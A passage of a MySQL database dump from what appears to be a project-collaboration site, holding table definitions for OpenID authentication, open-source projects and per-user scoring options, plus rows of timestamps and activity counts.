14:31:53'),(121,121,'2021-01-11 15:43:23','2020-12-16 16:06:31','2021-01-11 15:43:23'),(122,122,'2021-01-26 19:01:18','2020-12-16 18:54:54','2021-01-26 19:01:18'),(123,123,'2020-12-17 10:03:56','2020-12-17 10:03:56','2020-12-17 10:03:56'),(124,124,'2020-12-17 11:17:57','2020-12-17 11:17:57','2020-12-17 11:17:57'),(125,125,'2020-12-17 11:22:00','2020-12-17 11:22:00','2020-12-17 11:22:00'),(126,126,'2020-12-18 18:53:33','2020-12-18 18:53:33','2020-12-18 18:53:33'),(127,127,'2020-12-22 19:48:05','2020-12-22 19:48:05','2020-12-22 19:48:05'),(128,128,'2020-12-25 13:53:22','2020-12-24 15:19:18','2020-12-25 13:53:22'),(129,129,'2021-01-19 11:40:10','2020-12-27 11:43:54','2021-01-19 11:40:10'),(130,130,'2020-12-28 11:28:50','2020-12-28 11:28:50','2020-12-28 11:28:50'),(131,131,'2020-12-29 11:32:47','2020-12-29 11:32:47','2020-12-29 11:32:47'),(132,132,'2020-12-29 15:12:24','2020-12-29 15:12:24','2020-12-29 15:12:24'),(133,133,'2020-12-29 15:21:31','2020-12-29 15:21:31','2020-12-29 15:21:31'),(134,134,'2020-12-29 15:24:04','2020-12-29 15:24:04','2020-12-29 15:24:04'),(135,135,'2020-12-30 10:05:30','2020-12-30 10:05:30','2020-12-30 10:05:30'),(136,136,'2021-01-05 10:33:26','2021-01-05 10:33:26','2021-01-05 10:33:26'),(137,137,'2021-01-05 18:41:43','2021-01-05 18:41:43','2021-01-05 18:41:43'),(138,138,'2021-01-06 10:52:46','2021-01-06 10:52:46','2021-01-06 10:52:46'),(139,139,'2021-01-06 11:04:59','2021-01-06 11:04:59','2021-01-06 11:04:59'),(140,140,'2021-01-06 11:12:28','2021-01-06 11:12:28','2021-01-06 11:12:28'),(141,141,'2021-01-06 11:21:36','2021-01-06 11:21:36','2021-01-06 11:21:36'),(142,142,'2021-01-06 11:29:05','2021-01-06 11:29:05','2021-01-06 11:29:05'),(143,143,'2021-01-06 11:39:56','2021-01-06 11:39:56','2021-01-06 11:39:56'),(144,144,'2021-01-06 11:47:58','2021-01-06 11:47:58','2021-01-06 11:47:58'),(145,145,'2021-01-06 14:02:22','2021-01-06 14:02:22','2021-01-06 14:02:22'),(146,147,'2021-01-06 14:44:32','2021-01-06 14:44:32','2021-01-06 14:44:32'),(147,148,'2021-01-06 14:55:47','2021-01-06 14:55:47','2021-01-06 14:55:47'),(148,149,'2021-01-13 09:38:22','2021-01-06 15:44:02','2021-01-13 09:38:22'),(149,150,'2021-01-06 15:49:26','2021-01-06 15:49:26','2021-01-06 15:49:26'),(150,151,'2021-01-06 16:24:55','2021-01-06 16:24:55','2021-01-06 16:24:55'),(151,152,'2021-01-07 15:22:44','2021-01-07 15:22:44','2021-01-07 15:22:44'),(152,153,'2021-01-13 11:04:28','2021-01-13 11:04:28','2021-01-13 11:04:28'),(153,155,'2021-01-22 15:35:25','2021-01-22 15:35:25','2021-01-22 15:35:25'),(154,156,'2021-02-04 09:10:55','2021-01-26 09:20:06','2021-02-04 09:10:55'),(155,157,'2021-01-26 18:21:59','2021-01-26 18:21:59','2021-01-26 18:21:59'),(156,158,'2021-01-28 15:58:34','2021-01-28 15:58:34','2021-01-28 15:58:34'),(157,159,'2021-01-28 18:25:26','2021-01-28 18:25:26','2021-01-28 18:25:26'),(158,160,'2021-01-28 23:13:22','2021-01-28 23:13:22','2021-01-28 23:13:22'),(159,161,'2021-02-20 09:25:50','2021-02-20 09:25:50','2021-02-20 09:25:50'),(160,162,'2021-02-20 09:26:02','2021-02-20 09:26:02','2021-02-20 09:26:02'),(161,163,'2021-02-20 09:32:11','2021-02-20 09:32:11','2021-02-20 09:32:11'),(162,164,'2021-02-20 09:37:17','2021-02-20 09:37:17','2021-02-20 09:37:17'),(163,165,'2021-02-20 09:43:55','2021-02-20 09:43:55','2021-02-20 09:43:55'),(164,166,'2021-02-20 09:44:37','2021-02-20 09:44:37','2021-02-20 09:44:37'),(165,167,'2021-02-20 09:48:10','2021-02-20 09:48:10','2021-02-20 09:48:10'),(166,168,'2021-02-20 09:58:39','2021-02-20 09:58:39','2021-02-20 09:58:39'),(167,169,'2021-02-20 10:13:41','2021-02-20 10:13:41','2021-02-20 10:13:41'),(168,170,'2021-02-20 10:34:58','2021-02-20 10:34:58','2021-02-20 10:34:58'),(169,171,'2021-02-20 10:41:53','2021-02-20 10:41:53','2021-02-20 10:41:53'),(170,172,'2021-02-20 11:02:04','2021-02-20 11:02:04','2021-02-20 11:02:04'),(171,173,'2021-02-20 13:26:02','2021-02-20 13:26:02','2021-02-20 13:26:02'),(172,174,'2021-02-20 14:13:02','2021-02-20 14:13:02','2021-02-20 14:13:02'),(173,175,'2021-03-04 10:50:17','2021-02-20 14:22:15','2021-03-04 10:50:17'),(174,176,'2021-02-20 19:46:55','2021-02-20 19:46:55','2021-02-20 19:46:55'),(175,177,'2021-02-21 14:02:22','2021-02-21 14:02:22','2021-02-21 14:02:22'),(176,178,'2021-02-22 22:36:59','2021-02-22 22:36:59','2021-02-22 22:36:59'),(177,179,'2021-02-24 14:52:38','2021-02-24 14:52:38','2021-02-24 14:52:38'),(178,180,'2021-02-24 17:51:45','2021-02-24 17:51:45','2021-02-24 17:51:45'),(179,181,'2021-02-25 08:42:04','2021-02-25 08:42:04','2021-02-25 08:42:04'),(180,182,'2021-03-01 16:17:07','2021-02-25 08:49:06','2021-03-01 16:17:07'),(181,183,'2021-02-25 14:01:00','2021-02-25 14:01:00','2021-02-25 14:01:00'),(182,184,'2021-02-26 10:24:39','2021-02-26 10:24:39','2021-02-26 10:24:39'),(183,185,'2021-02-26 20:15:44','2021-02-26 20:15:44','2021-02-26 20:15:44'),(184,186,'2021-03-01 19:03:55','2021-03-01 19:03:56','2021-03-01 19:03:56'),(185,187,'2021-03-01 22:07:13','2021-03-01 22:07:13','2021-03-01 22:07:13'),(186,189,'2021-03-06 20:29:23','2021-03-03 07:35:42','2021-03-06 20:29:23'),(187,190,'2021-03-04 10:12:27','2021-03-04 10:12:27','2021-03-04 10:12:27'),(188,191,'2021-03-04 10:16:31','2021-03-04 10:16:31','2021-03-04 10:16:31'),(189,192,'2021-03-04 10:17:21','2021-03-04 10:17:21','2021-03-04 10:17:21'),(190,193,'2021-03-04 10:19:53','2021-03-04 10:19:53','2021-03-04 10:19:53'),(191,194,'2021-03-04 10:19:59','2021-03-04 10:19:59','2021-03-04 10:19:59'),(192,195,'2021-03-04 10:20:06','2021-03-04 10:20:06','2021-03-04 10:20:06'),(193,196,'2021-03-04 10:27:32','2021-03-04 10:27:32','2021-03-04 10:27:32'),(194,197,'2021-03-04 10:28:07','2021-03-04 10:28:07','2021-03-04 10:28:07'),(195,198,'2021-03-04 10:29:41','2021-03-04 10:29:41','2021-03-04 10:29:41'),(196,199,'2021-03-04 10:42:07','2021-03-04 10:42:07','2021-03-04 10:42:07'),(197,200,'2021-03-04 11:10:46','2021-03-04 11:10:46','2021-03-04 11:10:46'),(198,201,'2021-03-05 10:32:57','2021-03-05 10:32:57','2021-03-05 10:32:57'),(199,202,'2021-03-05 11:23:45','2021-03-05 11:23:45','2021-03-05 11:23:45'),(200,203,'2021-03-05 13:12:22','2021-03-05 13:12:22','2021-03-05 13:12:22'),(201,204,'2021-03-05 14:19:55','2021-03-05 14:19:55','2021-03-05 14:19:55'),(202,205,'2021-03-05 14:37:57','2021-03-05 14:37:57','2021-03-05 14:37:57'),(203,206,'2021-03-05 22:04:34','2021-03-05 22:04:34','2021-03-05 22:04:34'),(204,207,'2021-03-06 18:31:30','2021-03-06 17:19:19','2021-03-06 18:31:30'),(205,208,'2021-03-08 09:43:11','2021-03-06 17:26:16','2021-03-08 09:43:11'),(206,209,'2021-03-06 18:04:36','2021-03-06 18:04:36','2021-03-06 18:04:36'),(207,210,'2021-03-06 19:56:38','2021-03-06 19:56:38','2021-03-06 19:56:38'),(208,211,'2021-03-07 23:20:59','2021-03-07 23:20:59','2021-03-07 23:20:59'),(209,212,'2021-03-09 16:01:16','2021-03-09 16:01:16','2021-03-09 16:01:16'),(210,213,'2021-03-09 16:20:16','2021-03-09 16:20:16','2021-03-09 16:20:16'),(211,214,'2021-03-09 16:43:12','2021-03-09 16:43:12','2021-03-09 16:43:12'),(212,215,'2021-03-09 21:49:19','2021-03-09 21:49:19','2021-03-09 21:49:19'),(213,216,'2021-03-10 18:03:19','2021-03-10 18:03:19','2021-03-10 18:03:19'),(214,217,'2021-03-11 07:02:07','2021-03-11 07:02:07','2021-03-11 07:02:07'),(215,218,'2021-03-11 15:05:29','2021-03-11 15:05:29','2021-03-11 15:05:29'),(216,219,'2021-03-12 20:36:44','2021-03-12 20:36:44','2021-03-12 20:36:44'),(217,220,'2021-03-13 11:50:02','2021-03-13 11:50:02','2021-03-13 11:50:02'),(218,221,'2021-03-13 14:46:34','2021-03-13 14:46:34','2021-03-13 14:46:34');
|
||
/*!40000 ALTER TABLE `onclick_times` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `open_id_authentication_associations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `open_id_authentication_associations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `open_id_authentication_associations` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`issued` int(11) DEFAULT NULL,
|
||
`lifetime` int(11) DEFAULT NULL,
|
||
`handle` varchar(255) DEFAULT NULL,
|
||
`assoc_type` varchar(255) DEFAULT NULL,
|
||
`server_url` blob,
|
||
`secret` blob,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `open_id_authentication_associations`
|
||
--
|
||
|
||
LOCK TABLES `open_id_authentication_associations` WRITE;
|
||
/*!40000 ALTER TABLE `open_id_authentication_associations` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `open_id_authentication_associations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `open_id_authentication_nonces`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `open_id_authentication_nonces`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `open_id_authentication_nonces` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`timestamp` int(11) NOT NULL,
|
||
`server_url` varchar(255) DEFAULT NULL,
|
||
`salt` varchar(255) NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `open_id_authentication_nonces`
|
||
--
|
||
|
||
LOCK TABLES `open_id_authentication_nonces` WRITE;
|
||
/*!40000 ALTER TABLE `open_id_authentication_nonces` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `open_id_authentication_nonces` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `open_source_projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `open_source_projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `open_source_projects` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`description` text,
|
||
`commit_count` int(11) DEFAULT '0',
|
||
`code_line` int(11) DEFAULT '0',
|
||
`users_count` int(11) DEFAULT '0',
|
||
`last_commit_time` date DEFAULT NULL,
|
||
`url` varchar(255) DEFAULT NULL,
|
||
`date_collected` date DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `open_source_projects`
|
||
--
|
||
|
||
LOCK TABLES `open_source_projects` WRITE;
|
||
/*!40000 ALTER TABLE `open_source_projects` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `open_source_projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `option_numbers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `option_numbers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `option_numbers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`memo` int(11) DEFAULT NULL,
|
||
`messages_for_issues` int(11) DEFAULT NULL,
|
||
`issues_status` int(11) DEFAULT NULL,
|
||
`replay_for_message` int(11) DEFAULT NULL,
|
||
`replay_for_memo` int(11) DEFAULT NULL,
|
||
`follow` int(11) DEFAULT NULL,
|
||
`tread` int(11) DEFAULT NULL,
|
||
`praise_by_one` int(11) DEFAULT NULL,
|
||
`praise_by_two` int(11) DEFAULT NULL,
|
||
`praise_by_three` int(11) DEFAULT NULL,
|
||
`tread_by_one` int(11) DEFAULT NULL,
|
||
`tread_by_two` int(11) DEFAULT NULL,
|
||
`tread_by_three` int(11) DEFAULT NULL,
|
||
`changeset` int(11) DEFAULT NULL,
|
||
`document` int(11) DEFAULT NULL,
|
||
`attachment` int(11) DEFAULT NULL,
|
||
`issue_done_ratio` int(11) DEFAULT NULL,
|
||
`post_issue` int(11) DEFAULT NULL,
|
||
`score_type` int(11) DEFAULT NULL,
|
||
`total_score` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=115 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `option_numbers`
|
||
--
|
||
|
||
LOCK TABLES `option_numbers` WRITE;
|
||
/*!40000 ALTER TABLE `option_numbers` DISABLE KEYS */;
|
||
INSERT INTO `option_numbers` VALUES (1,1,0,5,3,0,0,3,0,0,0,0,0,0,0,0,0,1,3,22,1,112,'2018-07-06 17:42:31','2020-12-22 19:50:08',NULL),(2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,12,'2018-07-18 16:50:44','2018-07-19 09:52:33',3),(3,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,9,'2018-07-20 10:01:50','2018-08-03 17:07:26',8),(4,5,0,5,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,1,53,'2018-07-20 10:17:47','2018-08-10 09:19:23',NULL),(5,5,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,2,17,'2018-07-20 10:17:47','2018-08-10 09:19:23',13),(6,5,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,12,'2018-07-20 10:19:30','2018-07-20 10:21:01',11),(7,5,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,2,24,'2018-07-20 10:21:31','2018-08-08 09:22:07',12),(8,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,1,14,'2018-07-20 14:50:29','2019-01-22 09:20:38',NULL),(9,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2018-07-20 14:50:29','2018-07-20 14:51:24',18),(10,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2018-08-03 16:05:55','2018-08-03 16:05:55',NULL),(11,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,6,'2018-08-03 16:40:00','2018-08-03 17:50:18',18),(12,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2018-08-03 18:35:14','2018-08-03 18:35:14',19),(13,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2018-08-03 18:50:40','2018-08-03 18:50:51',20),(14,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2018-08-03 18:52:08','2018-08-03 18:52:08',21),(15,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,'2018-08-10 09:18:52','2018-08-10 09:19:06',13),(16,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2018-11-14 14:54:47','2018-11-14 14:54:47',32),(17,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,12,'2018-11-22 23:27:43','2018-11-23 00:37:57',76),(18,19,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,1,12,'2019-01-15 15:08:26','2019-01-21 10:17:25',NULL),(19,19,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,2,8,'2019-01-15 15:08:31','2019-01-15 15:09:06',81),(20,19,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-01-21 10:17:25','2019-01-21 10:17:25',94),(21,1,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,2,22,'2019-01-21 15:39:03','2019-08-14 16:56:16',95),(22,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,5,2,23,'2019-01-22 00:35:19','2019-01-22 00:57:05',100),(23,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,2,4,'2019-01-22 00:45:20','2019-01-22 00:46:41',100),(24,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,2,12,'2019-01-22 09:14:03','2020-02-03 18:06:36',101),(25,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,2,'2019-01-22 09:20:38','2019-01-22 09:20:38',101),(26,26,0,9,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,7,1,41,'2019-03-05 15:49:52','2019-09-09 13:57:17',NULL),(27,26,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-03-05 15:49:52','2019-03-05 15:49:52',120),(28,31,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-03-22 10:22:20','2019-08-14 16:55:04',NULL),(29,31,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2019-03-22 10:22:37','2019-08-14 16:55:04',121),(30,43,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,6,'2019-04-17 09:59:58','2019-04-17 17:36:14',NULL),(31,43,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,6,'2019-04-17 10:07:15','2019-04-17 17:36:14',130),(32,26,0,9,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,6,2,37,'2019-04-17 13:19:30','2019-04-29 13:22:20',130),(33,47,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-08-06 09:56:11','2019-08-06 09:56:11',NULL),(34,48,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-08-07 10:09:20','2019-08-07 10:09:20',NULL),(35,51,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,'2019-08-07 15:03:10','2019-08-07 15:03:10',NULL),(36,51,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-08-07 15:03:10','2019-08-07 15:03:10',130),(37,49,0,7,9,0,0,0,0,0,0,0,0,0,0,0,0,3,10,9,1,84,'2019-08-07 15:50:55','2020-08-10 18:04:42',NULL),(38,52,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-08-07 15:53:10','2019-08-07 15:53:10',NULL),(39,50,0,2,13,0,0,1,0,0,0,0,0,0,0,0,0,0,21,4,1,75,'2019-08-07 16:13:56','2020-10-15 19:16:38',NULL),(40,46,0,10,1,0,0,2,0,0,0,0,0,0,0,0,0,1,1,15,1,81,'2019-08-07 16:50:01','2020-10-14 17:08:01',NULL),(41,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-08-08 08:48:02','2019-08-08 08:48:02',128),(42,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-08-08 15:34:53','2019-11-08 10:29:31',134),(43,53,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,2,'2019-08-13 10:53:50','2019-08-14 10:11:03',NULL),(44,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-08-13 16:32:02','2019-09-02 10:04:28',134),(45,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-08-14 08:13:04','2019-08-16 08:17:32',133),(46,46,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-08-14 14:35:38','2019-08-14 14:35:38',130),(47,50,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,10,'2019-08-16 09:24:33','2019-09-02 08:56:25',141),(48,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-08-23 15:09:37','2019-08-23 15:09:37',144),(49,20,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,1,3,1,27,'2019-09-06 08:52:22','2019-10-08 13:49:53',NULL),(50,26,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2019-09-09 13:57:00','2019-09-09 13:57:17',149),(51,56,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-09-16 10:32:45','2019-09-16 10:32:45',NULL),(52,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,2,8,'2019-10-08 10:44:52','2019-10-08 13:49:53',155),(53,20,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,1,2,2,19,'2019-10-08 11:00:58','2019-10-08 13:48:55',161),(54,46,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,2,9,'2019-10-23 15:36:35','2019-10-23 16:15:25',169),(55,49,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,2,7,'2019-10-23 16:45:23','2019-10-23 16:54:49',169),(56,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2019-10-24 17:56:28','2019-11-08 08:47:30',155),(57,59,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,'2019-10-25 14:43:03','2019-11-06 16:21:13',NULL),(58,61,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,9,'2019-10-31 16:54:19','2019-10-31 17:02:39',NULL),(59,61,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,9,'2019-10-31 16:54:19','2019-10-31 17:02:39',188),(60,46,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,15,'2019-10-31 16:57:23','2019-11-06 16:25:06',188),(61,59,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-10-31 17:04:31','2019-10-31 17:04:31',188),(62,49,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,2,3,'2019-10-31 17:05:53','2019-10-31 17:05:53',188),(63,59,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2019-10-31 17:19:45','2019-11-06 16:21:13',189),(64,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,1,40,'2019-11-01 15:46:45','2019-11-11 17:13:17',NULL),(65,65,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,1,19,'2019-11-01 15:58:26','2019-11-22 10:17:02',NULL),(66,63,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,1,13,'2019-11-01 16:28:07','2019-11-08 11:29:59',NULL),(67,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-06 16:38:25','2019-11-06 16:38:25',192),(68,49,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-11-06 16:39:06','2019-11-07 10:38:03',192),(69,66,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,5,1,23,'2019-11-06 17:08:18','2020-08-10 14:40:43',NULL),(70,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,8,'2019-11-07 11:14:16','2019-11-07 11:14:16',194),(71,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-07 11:15:06','2019-11-07 11:15:06',194),(72,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,'2019-11-07 14:49:08','2019-11-07 14:58:03',197),(73,46,0,5,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,6,2,32,'2019-11-07 16:05:58','2019-11-22 10:30:35',199),(74,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,9,2,36,'2019-11-07 16:21:16','2019-11-11 10:35:21',199),(75,49,0,3,8,0,0,0,0,0,0,0,0,0,0,0,0,3,8,2,2,47,'2019-11-07 16:27:26','2019-11-11 17:16:42',199),(76,71,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,'2019-11-08 09:11:56','2019-11-08 09:11:56',NULL),(77,71,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-11-08 09:11:56','2019-11-08 09:11:56',199),(78,65,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,2,19,'2019-11-08 10:59:33','2019-11-22 10:17:02',199),(79,50,0,0,13,0,0,0,0,0,0,0,0,0,0,0,0,0,21,0,2,55,'2019-11-08 11:08:19','2019-11-08 14:49:53',199),(80,63,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,2,13,'2019-11-08 11:10:36','2019-11-08 11:29:59',199),(81,66,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,2,21,'2019-11-10 12:44:07','2019-11-11 10:29:15',199),(82,46,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-11 09:59:56','2019-11-11 09:59:56',208),(83,49,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-11-11 10:00:12','2019-11-11 10:00:12',208),(84,64,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-11 17:13:17','2019-11-11 17:13:17',232),(85,49,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2019-11-11 17:13:34','2019-11-11 17:13:34',232),(86,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-12 09:05:56','2019-11-25 11:01:02',234),(87,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-12 09:18:38','2019-11-12 09:18:38',235),(88,49,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2019-11-12 10:16:03','2019-11-12 10:16:03',237),(90,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,'2019-12-30 08:26:43','2019-12-30 08:26:43',NULL),(91,75,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,1,0,0,1,8,'2020-02-01 19:31:38','2020-02-04 22:26:14',NULL),(92,75,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,4,'2020-02-01 19:31:40','2020-02-01 19:31:40',251),(93,76,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,7,0,1,1,34,'2020-02-04 22:00:33','2020-04-20 20:44:50',NULL),(94,76,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,4,'2020-02-04 22:00:33','2020-02-04 22:00:33',251),(95,79,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,2,'2020-02-04 22:48:24','2020-02-04 22:48:24',NULL),(96,80,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,2,0,1,6,'2020-02-04 22:51:34','2020-03-19 14:13:32',NULL),(97,81,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,17,0,20,1,148,'2020-02-11 09:49:06','2020-02-11 21:51:34',NULL),(98,81,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,17,0,20,2,148,'2020-02-11 09:54:10','2020-02-11 21:51:34',255),(99,86,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,'2020-02-11 10:42:16','2020-02-11 10:42:16',NULL),(100,86,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2020-02-11 10:42:16','2020-02-11 10:42:16',255),(101,89,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,'2020-02-11 11:29:44','2020-02-11 11:31:22',NULL),(102,89,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,'2020-02-11 11:29:44','2020-02-11 11:31:22',255),(103,77,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,1,5,'2020-02-11 11:33:33','2020-02-11 17:56:10',NULL),(104,77,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,'2020-02-11 11:33:33','2020-02-11 